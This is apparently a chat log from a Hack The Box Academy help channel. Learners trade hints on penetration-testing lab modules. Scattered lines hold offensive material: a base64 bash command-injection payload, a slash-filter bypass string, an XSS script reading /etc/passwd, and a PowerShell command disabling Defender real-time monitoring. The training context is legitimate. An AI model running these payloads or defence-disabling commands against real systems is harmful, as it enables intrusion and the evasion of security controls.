Web Attacks: Bypassing Basic Authentication, curling OPTIONS
For whatever reason - I cant get this to work. curl -i -X OPTIONS http://SERVER_IP:PORT/ I get a response from the server, but I DO NOT get hte Allow field in the response. Any ideas why?

is anyone available for AD Skill Assessment 2 question 4? ||I got a list of domain users and I think it's talking about password spraying but the tools I'm using are giving me weird output so not sure if the tool is wrong, I'm executing it wrong or if password spraying just isn't it ||

what are you using?

||crackmapexec and kerbrute through proxychains||

I was wondering if someone can validate the error I am running into. Attacking Enterprise Networks module, Web Enumeration & Exploitation module, on the wordpress section, when I go to login to http://ir.inlanefreight.local/wp-login.php I get a proxy error.

review this section -- Internal Password Spraying - from Windows

Try to use an internal password sprying, theres a section where show how to do that

Have u done the ACTIVE DIRECTORY ENUMERATION & ATTACKS module?

I need some help

Yes

I'm going to go out on a limb here and state that this portion of the module is broken and doesnt work.

Im on the Q10: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
Im lost

I'm on the hard lab for Password Attacks and I was able to confirm that the base64 encode of the kdbx file is correct this time. However, when I use john to decrypt it after doing the base64 --decode, I still get the error of Unknown format : File signature invalid. Any clue why that would be?

does anyone have the "web attacks" module in academy? I'd like a second check to ensure this issue is across multiple users and then I'll submit it for consideration to be fixed

Sorry, I'm not there yet. Still beating my head against the wall with Password Attacks.

I'll DM you

can I dm you

~~Hi, I'm working through the file transfers module and the windows remote box keeps freezing within like a minute of spawning and the rdp session closes and I have to respawn the box, any ideas what I might be doing wrong?~~nevermind

please i need help for XSS module

phising part iam stuck on that

its really ambigious

where is the VICTIM an whom is it?

Ya pm me if you need to

Could i pm anyone please for this?

Does this sound right? In the Password Attacks hard lab I found a password that starts with Q and ends in ! but I can't find where to use it.

Holy moly! The Skills Assessment for AD Enumeration & Attacks - Skills Assessment Part II was a beast! But so fun!

you’re on the right track keeping going!

Thank you! I'm just not sure where to use it because there are only two other users on this machine and it's not for either one.

you got that password from a certain password protected file maybe you should open the file with that password😉

Ah, got it! Thank you for the hint!

Bro I have one doubt

+3 What is the name of the first section of this module? If you are using a translation solution while studying, please

disable it temporarily to enter the first section's name in English.

Tell the answer any one

what module is this?

https://academy.hackthebox.com/module/15/section/33

Page no 3 go

it's better to just say the name of the module

In the Table of Contents, what is the first item in that list

It is explained what a section is... in the Section titled "Sections"

Please tell answer bro

Module: Secure Coding 101
Section: Skills Assessment
If anyone has completed that and can help me with the /Reverse and /Patch questions, I would really appreciate any help! Can DM me!

Read

Mm i am solved

@fathom pendant thanks

Dm, if you still need help

another user helped me i got the flag thx

I need some help with Footprinting medium lab, ||I have super admin's credentials and need to access the database but can't find the right tool to do so.|| Any nudge?

Your Windows user A*** is not allowed to access the database.
You need another Windows user with which you can log in via RDP

I have credentials for sa, was able to get a shell too, I will try RDP first

Some users are lazy and use the same password for multiple accounts 😉

thank you, I will try

Can pentesting also work with kali purple or is it only for defensive? Also, which one do you recommend more if the normal kali or the purple?

After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. any one tell me how to solve this

Thank you for your help buddy. I came back to this challenge after a two month break and finally did it right.
Back in the good old days I had overcomplicated this way too much and now that I look back your solution is far more easier than mine.

Hello guys, i am currently doing the SNMP module and i am stuck on the last question. I have found the script but I don't understand how to run it then I can submit the output. Any hint ?

Thanks in advance !

Which module, which section?

Which module, which section?

SNMP module in footprinting section 🙂

You can use || snmpwalk ||

actually I find it using this tool but don't know what to do next. Maybe I don't understand the question ? 🥲

🔥

Another awesome module by @dense ferry

Enumerate ||community strings and MIBs||, more could be found on that section, if you get stuck lmk.

OK thx guys, I will try harder

OK found it, I was not looking for the right thing

Thx for the help

So many new modules, so little time🙈
Thanks @dense ferry for all the new modules. I am looking forward to benefit from your knowledge 🤩

Hello,

I'm sorry for this noob question, but it's not clear for me and haven't found information on it...

What are the order of the modules in a path? In the first "Cracking into Hack the Box" path it has started the "web requests" module first and not the "getting started" module. I know I can manually pick it, but I was wondering If I choose a path then how should I know in what order I should go?

Thank you in advance!

Simply start in a path with module 1 then 2 then 3, etc.

so in idea they are already in order. For the "Cracking into Hack the Box" it feels a bit weird to don't start with the "Getting started" (in fact it's the last one). But try to follow it that way.

Thank you!

In Getting Started you can use the knowledge from the Web Requests module.

I see. 🙂 Thank you for clarifying it for me 🙂

Hi, I am new to this platform and I wanted to get started with hacking, can someone please help me where to get started?

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hey can anyone help me with this:
I have a general question regarding nmap: When we use IP spoofing to evade a firewall with for example a trusted IP address in the network how does nmap get the packets to know that other ports are open? Like in the example I looked at nmap found 2 open ports SSH and HTTP but when we spoofed the IP address (to a trusted one) nmap found also an FTP port open. The thing is how does nmap determine that? If we spoofed our ip address nmap shoudn't get back any packets etc.

So i have done a couple of modules and still need to do a lot but i have been practising with some machines i did bashed, lame and devel for bashed i needed a little bit of help for the root user but do any of you have any recommendations for some machines?

Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities
.
.
Task: "Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop. "
.
I generated the DLL file via msfvenom.
I started the smbserver on my linux machine.
I started the metasploit listener.
When i execute the exploit i get an error, any idea on how to fix that? TIA :)

is there some kind of typo in my smbserver command?

Can anyone give me a nudge for footprinting hard lab?
||I tried imap-brute to find credentials but it failed, is it bruteforce or something else that I am missing?||

after you complete modules, some will recommend challenges and boxes to complete. For me, I'm going to also do the Active Directory 101 and Intro to Dante Tracks on HTB. People say Dante Pro Lab is a good practice to. If you have access to Endgames, this can help you with pivoting as well. Additionally, you may want to try Linux Privilege Escalation 101 Track. These are just suggestions though as all you really need is what is taught in the modules.

Thanks

tracks are a collection of challenges/boxes from the main platform (https://app.hackthebox.com/tracks). you can scroll through and if you think anything might be related and you try the track! You could probably just do Easy, Medium, Hard (skip Insane) and be okay

you can dm me

Thanks @rustic sage

Command Injection module
Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

I've been stumped on this one for a while now and the results I get seems to be sending me deep into a rabbit hole that just makes no sense

So my first reaction was to encrypt the code above and passing it into a bash in burp like so
||%0abash<<<$(base64%09-d<<<ENCODED_COMMAND)||
and then I get wrong input promt, However if I encode a different command like "ls -la", it works perfectly. I've also tried reversing each and every word in the line individually but still no avail.

Does anyone know why some encoded commands works while other output "wrong input"

an oddity as well, Some commands stop working and requires a refresh to rectify

Intro to Windows command line - Skill Assessement

I am at the user9 where we need to use tasklist to find the flag but when I do the challenge and I try to enter all possible processes name, it returns "Incorrect Answer" and I'm stuck.

Can you help me ?
Thanks

Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) Format appears to just be Subnet/Netmaskt, none of the routes w/ respected subnets autoroutes add seems to be an answer. Or am I missing something?

could I get a nudge on ad skill assessment 2 question 6? ||I got the creds for the other user but they don't seem useful? I tried SMB on both servers (with both the first and second user), tried mssql, tried Snaffler on the RDP host, tried logging in with the creds over RDP||

what is the lab question?

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

With the user you found earlier B**, you can use|| smbmap|| and look for a ||configuration file||.

Hey all, I wanted to share since I see many of you were struggling on the ptunnel-ng lab like me. Downloading from GitHub and running the script per the author's instructions causes a bunch of errors. Turns out you can download the ptunnel-ng binary through apt and then just use that.

I tried that but I get an authentication error - ||proxychains smbmap -u ... -p ... -d inlanefreight.local -H ...||

So you are looking at the wrong ip address

only 3 to choose from an I tried all 3 lol

they all throw Authentication Error on IP

That's weird, literally my command is ||smbmap -user -password -d domain -h ip --download 'path'||

could I DM you? ||I can't use --download yet as I don't know the shares lol||

ahhh... ||works with A not B tho||

wait nvm

the command works but can't access the shares

okay i reset and it works

I need help in skills assesment from sqlmap essenntials can't actually find where to inject my clause

utilizing slqmap

maybe have to fuzz for directories?

you can dm

thanks

you can dm

your command is correct i just tried it maybe you're not encoding the payload correctly

hello guys im in the module COMMAND INJECTIONS and im trying to do the exercise that tells: Use what you learned in this section find the content of flag.txt in the home folder of the user you previously found. when i put cat /home/flag.txt i give a error and i dont know how to bypass it, somebody can help me?

i spend 3 hours with this exercise

Not sure if you got an answer or not. Windows Defender is deleting the DLL so you need to first disable it with ||Set-MpPreference -DisableRealTimeMonitoring $true||

Hey on the SocksOverRDP module, it doesn't appear the internal host is loading? 172.16.6.155

disable it through Windows Security

Hi Guys, I may need some help for the Common Session Variables (Auth Bypass) module. I cannot find the reset.php files in the target.

hello guys need help
what to do when my facebook account forgot gmail cellphone number and password

not the place for this....

somebody know how can scape / character

Because it's in the home folder of the user, /home/user/flag.txt read the question more carefully

i cant use / character

is in /flag.txt

Put in a\ first

invalid input

So\/flag.txt or double it

What is the directory you're trying to access

im in directory /var/www/html

i have to read the flag and its in directory / i think

but i cant execute ls /

because / character is in black list

Then try doubling up the /

If you're doing directory traversal this way it would be similar, ....// As the sanitation method would remove an instance of "../" but leave the other

/ doesnt work

can i call you?

No

im in COMMAND INJECTIONS
Page 8
Bypassing Blacklisted Commands
Bypassing Blacklisted Commands

Perhaps looking at the techniques in the module and revisiting things may help

im looking at 3 houts

this is the solution

In the Attacking Enterprise Networks -- Web Enumeration & Exploitation section -- Under Dealing with The Unexpected There is javascript code that can be used to read files, <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText)}; x.open("GET","file:///etc/passwd"); x.send(); </script> I am supposed to find a flag and read it. Can someone give me a pointer on how to locate the flag I should read? Is there a way to get RCE here or a Shell? Thanks so much!

Did you read the section carefully? It tells you how to bypass it in "Bypassing Other Blacklisted Characters"
Also https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command Injection

Hello 🙂
I am not sure if this is the right section but I am looking for help.
I am still at the starting point "Oopsie" from Tier2. Here is the walkthrough https://app.hackthebox.com/c11a813f-39b1-4de3-8c4e-138b9be9ad59
I am in the machine already via reverse shell but I am stuck creating the fake "cat" to escalate privileges (search for "We will navigate to /tmp directory and create a file named cat with the following content:" in the document to find it).
I am in the tmp directory but doing the ls command I can see that there is already a file called cat where I do not have permissions to edit it. I tried to chmod it to get privileges but of course I cannot.
Basically I tried doing "touch cat" and then write it via vim. I also tried to echo the content and output it in a file called cat but I have a privilege issue.
Can you help a poor noob?

could someone help me with "Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host" on AD Skill assessment 2? ||I got access to the MSSQL and even got RCE.. Can't read the flag though.. Not sure where else to go from here. I got the service hash through responder, but can't crack it with Hashcat||

Oopsie is a box and can be asked for in #boxes

go here #starting-point instead of boxes

Didn't know it was a #starting-point box

you're good😂 they said Tier 2 so I looked quickly and there it was

Fair I just didn't know if other tracks had tiers

look for some attribute that a user has that can be used to escalate privileges

do you know the name of the user from previous section?

Thanks a lot! 🙂 It was solved from the guys at #starting-point 🙂

I already looked at ||impersonate no users show up. I also tried switching to sa but didn't really help||

You do not have to change the user, there are ||3 attributes that are enabled|| in the user, and therefore you can escalate privilege

I'm doing the XSS module and on the Phishing section when I try to do sudo nc -lvnp 80 to get the credentials from the form it says Failed to listen on 0.0.0.0:80 (reason: Address already in use) Is there another port I can listen too ? I'm not sure to understand

if you are using pwnbox, then you must choose a different port

80 is occupied by another crucial service

could you elaborate or can we dm? I'm still struggling on this

and wich one should i use ?

yes im using de pwnbox

whichever you choose

Hello mates! I have been stuck for several hours on this question in the Password Attack module: What is the default password of every newly created Inlanefreight Domain user account? I've found RDP access for Administrator ||B@bygirl10|| but not it's right way i think... you have a tips? THX

once you find a script you will know

good evening.
Skills Assessment - Using Web Proxies
3rd question. Fuzzing the last character of the md5 hash.
I am using Intruder added the required payload processors (prefix and the encoders)
when i let the attack run i see no result that is different to the others.

now my question do i need to supply some user/pass or is my way of using Intruder completly wrong?

I get nothing when I run the php script and I can't find what I did wrong

OK i try

there is a specific script for only this purpose

ok I found the answers to the last 2 questions THANK YOU!

Anyway to decrease some of the latency I’m getting when I rdp into ad attacks and enum its like 20-30 seconds and making me mad

I'm having an issue with the Blacklist Filters too. It seems that none uploaded files executes the php .

you can DM me if you want, show me what screen shots you have of your payloads

thanks, I did

Hey, I have a code reviewing interview coming up in multiple languages, Python, C, and JS. I was wondering which module would be most useful for this. I see Secure Coding 101:JS and Whitebox Pentesting that look to be particularly good. Anyone have any recommendations either here or somewhere else?

okay I'm progressing in AD Skill Assessment II however can I dm someone about question 8 an onward in DM? Don't want the answer just looking for clarification and confirm my methodology. Rather to dm to avoid spoilers

The intro to AD one?

no this is AD Enum and Attacks

How is that module?

Hi
Could you please help me with the last quest from DNS in Footprint module?

You have to find all the zones.

Yes I got it with dig

but idk what i'm doing wrong with dnsenum

it's not working, I made the string with all info but the output is like --help

Hello Dune here , new kid on the block

struggling with the first module ( will look back at some stage and laugh about this)

If you want, you can send me the command by DM. Then I will have a look at it.

it will be great 🙂

I sent

Which is the first module? It varies depending on the path.
If you want help, always say which module, which section and which question you need help with.

Spawn your target!
Spawn My Workstation if you haven't done so.
From your workstation, open Firefox and browse to the target URL.
Answer the question below.

dont quiet understand what target / my workstation is that the parrot/kali instance ?

What module

Interactive Section with Target

intro

Target is the button that says "spawn target", the workstation is the pwnbox instance or your vm

TY

Did you read the intro sections at all?

It's all fairly well explained per section

hi yes I did but as im new to this....

im on this but stuck in the same spot smh

It's literally explained though, unless English isn't your first language

someone around for this

I speak english , dutch and Xhosa

are you dutch

I can fix a car , wire your house , and have some other skills IT is not my day job

Ok, then it's reading comprehension :) that happens a lot with modules

No African

ahh

It's not mine either

And when it was, it wasn't at this level

I just sent parts out

it is comprehension , simple things over thought ie: what is the name of the first module is it a Path then a Module or are they litteraly asking what is the first module called ,or am I over thinking this ?

The module is the main thing it's talking about (i.e. intro to academy) a section is a small part of that module that talks about a more specific thing. The "Path" is just a collection and recommended order of things.

ok thought so , just tried to answer question one witht hat exact answer but says its incorrect

TY ,tried Path / tried Module _1

These are just examples.
What is the question?

What is the name of the first section of this module? If you are using a translation solution while studying, please disable it temporarily to enter the first section's name in English.

Okay, look in the Table of Content

Ty

it was so simple Thank you , my slight dyslexia during typing doesnt help

Just don't get discouraged. You will get better every day you train.

TY

can anyone assist me with module web attacks, section bypassing encoded references please?

the closing module section - I can get the get request to hit the server bu tno file download ever actually occurs

Have you tried it with curl? Don't remember any traps with this one, should just work.

i cant tell whats actually going on here - it appears to be just a get request ? I'm not seeing any additional post occuring

I have mocked it up in python, get request works and i get back a header with the file name, but thats it. No actual file is there to download.

HTTP/1.1 200 OK
Date: Tue, 21 Mar 2023 23:34:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Description: File Transfer
Cache-Control: no-cache, must-revalidate
Expires: 0
Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
Content-Length: 0
Pragma: public
Connection: close
Content-Type: application/pdf

looks like it's just the header

yeah, thats all i get back

have you actually tried using curl?

is there supposed to be a post request that occurs somewhere?

that looks like the curl -I command

curl also comes back blank on my end

what about just wget

anyone free for AD Skill Assessment II? 10. Crack this user's password hash and submit the cleartext password as your answer. ||I've used mimikatz, dumped lsass, and even got sam/security/system and I see a logon session for this user in lsass but their hash isn't there. Any ideas?||

my command looks like this: curl -soJ -X POST -d "contract=6f4922f45568161a8cdf4ad2299f6d23" http://209.xx.129.xx:xxxx/download.php

also interesting - when I download the contract from the web portal - its 0 bytes

Try it with a get request ||download.php?contract=.....|| post works as well but can't remember the url

same issue im afraid

what does your new command look like?

import requests, re, base64, urllib.parse

url = "xxx.xxx.xxx.xxx:xxxx/download.php?contract="
for i in range(20):
    uid = str(i)
    b64 = base64.b64encode(uid.encode("ascii"))
    turl = 'http://'+ url + urllib.parse.quote(b64)
    print(turl)
    x = requests.get('http://'+ url + urllib.parse.quote(b64), allow_redirects=True)
    print(x.text, x.headers, x.content)

or in burp with just a normal get request, its also blank

initated via web browser

when you clicked on the contracts > employment contract in the web gui - was the file it downloaded 0 bytes?

From memory they all should be blank except the one with the flag

even using the provided curl script - i get nothing

do you recall if you modified that script any

Just quickly ran through the exercise again, works fine for me, what are you using for the script? How many pdf's are you getting?

if i run the default provided script - just replace wiht my instances IP address, i get nothing back

#!/bin/bash

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
    done
done

no files in the working directory should i say

should be checking for 20 id's, not 10, i'll DM you what i used, you need to modify it

anyone? ||I reset the box thinking this was a mistake and now they don't appear at all in lsass so I'm thinking there is another intended way ||

Good morning , im on this module ,Directory Fuzzing, and am in an open terminal on htb ,have seen fuff is installed , following procedure but not sure what to do

relly so sad

no bady response till know 😢

U can dm if u want

Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

any idea what is happening here. I get the location but it says incorrect

anyone able to get through it

it could be that you are looking at a symlink

is there any idea to do cd /home

ip=127.0.0.1%0a%09{cd,${PATH:0:1}}${home}

I am looking at the Pwnbox. hope this is correct.

if you tell me from which module and section was that, I could be more helpful

with command injections you don't necessarily need to switch your working directory

Sorry what do you mean?

Laudanum, One Webshell To Rule Them All from shells & payloads

have you managed to look at the hint for the webshell

could anyone help me on file upload attacks skill assessment

Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer. anyone that may help me with this one, i have used rockyou, mut.passlist, password.list, top 1000000 passwords.

and made a custom wordlist for the ssh password of kira

if this is password attacks you only need the user, password, and mutated rules they’ve provided. I also believe this is the one with the hint you should read that and maybe you get an initial foothold

yes i is the one from password attacks, i have the zip and used al lists from the resources

hellou im trying to do the module command-injections skills assesment

can somebody help me please?

Hi guys, I'm interesting why on the penetration tester path you have the XSS module but not the Server-side Attacks module?

It came to me out of nowhere and now I'm worried to miss such good modules that aren't on the penetration tester path..

Can I get a nudge with the Fingerprinting: DNS final question about FQDN of .203, been stuck a little too long 😅

i built a new idea i want to try it come onnn

do u mean foot printing?

Yes sorry, brain fart

u need to perform subdomain bruteforcing to find it

Yea

it could be a subdomain of a subdomain

Can I DM you? I feel like I’ve been trying what you suggest

sure

.

Can I get some assistance with footprinting hard lab?
||I unable to attack SNMP and I keep getting timeouts. I can see DHCP but can't make any sense of it as it wasn't covered in the module.||

nothing is stopping you from taking the Server-Side Attacks and other modules before CPTS

you can dm

you can dm me

Anyone having problems also with spawning target machines ?
(stuck on Target is spawning)

Hi,
There is a problem with the website for spawn a target or it's just me ?

Same for me ...

I just spawned a lab no problem

At the same time @manic magnet here the same.

yeah xD

reminds me of the old times AOL advertisments on TV "Last week i was on the internet loading a website, ... i'm still loading."

Web attacks, chaining IDOR. Uid mismatch although i literally have the admin info

Any tip?

Nvm im idiot

reload the page, sometimes it happens to me

reloaded it about 10 times ... sill nothing happening

thats weird

i'm having the same problem

I just cracked it with the provided resources within the module. Double check your commands 😉

could try logging out clearing cache/cookies

is anyone having problems brute forcing the password for jason on attacking common services smb?

am using the resources provide by the module, but it wont find anything

is there a way to change crackmapexec smb to smb2 ?

still down ?

yeah

Why the box aren't spawning ?

yeah

hmm even restarting the browser, cleaning out the chache and rebooting computer did nothing

its a server side problem

dam you reboot the pc XD next level of trouble shooting XD

I took a look and it seems its the server side problem, the API response is always: {"success":0,"message":"No active VMs."} even though the spawn request gives us: {"success":1}

I just recompleted the section so if you need help feel free to dm. Can confirm though all you need is the provided resources

it's pretty much just killing a pod an starting up another one ^^

same here 🙂

I'm having no issues spawning machines so if you're struggling it's on your end. try clearing cache/cookies, signing out and back in, refresh the page, or all three

then it will work ? --'

I mean I can't confirm that "it will work"... all I'm saying is I'm having no issues so I'd assume it's on your end

nope , again its a server side problem

Maybe regional

For me it does not. Used different browser. They had maintanence for today probably it caused it

they are working on the problem atm

just contacted support and told me this : We are aware of the issue and currently investigating this issue.

it looks like they saw our suffering

ok someone is having fun with this...

XD

just spawn a new target

is it dangerous if i click on it again ?

totaly ... it's always to slap a tag of comedy on every problem

is anyone else having the same problem

nah still looks normal on my side, just not spawning at all

same.. not spawning here

stuck for ever

jup nothing to do right now, just waiting till they solve the issue

Did they disable machine spawning?

I can still spawn machines🤷‍♂️

I could too, in fact I did a couple of sections until I couldn't

anyone free for this

apparently they know the issue and are working on it. Must only be affecting certain users

Anyone else having trouble connecting to the other box on the lab for RDP and SOCKS Tunneling with SocksOverRDP I've waited more than the recommended time of 3-5min.

@rustic sage try some ||poisoning|| on ||MSQL01||

I'll try

They are in the Module: Password Attach to the question, Examine the target and find out the password of the user Will. Then, submit the password as the answer;|| I created a password file with the rules on the word LoveYou1 ||and via hydra in both FTP and SSH I tried to find the password|| for Kira and Will ||but it doesn't find anything... where am I going wrong?

If you still stuck in the Target is spawning process, please change the VPN Server and try again. If that doesn't help, please open up a support ticket.